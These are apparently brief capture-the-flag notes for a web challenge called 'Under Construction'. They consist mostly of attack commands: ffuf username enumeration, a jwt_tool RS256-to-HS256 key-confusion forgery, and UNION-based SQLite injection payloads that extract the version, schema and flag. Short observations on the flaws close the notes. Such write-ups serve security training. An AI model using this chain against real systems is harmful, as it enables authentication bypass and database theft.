Under Construction

ffuf -request req -w ../../usernames.txt -mr exists -u http://209.97.132.64:32647/auth -s Usernames: gale rosie • Key Confusion [RS256 > HS256] ./jwt_tool.py -t http://209.97.132.64:32365/ -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v • sqlite_version() <> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- " • table name -I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- " • column names [table create query in output is referred to check the column names] -I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- " • flag -I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- " ------------------------------------------------- observations: ------------------------------------------------- • JWT public key is present in JWT token • Enumerate usernames • JWT key confusion due to accepting both RS256 and HS256 • sqli is present on getUser request as input not escaped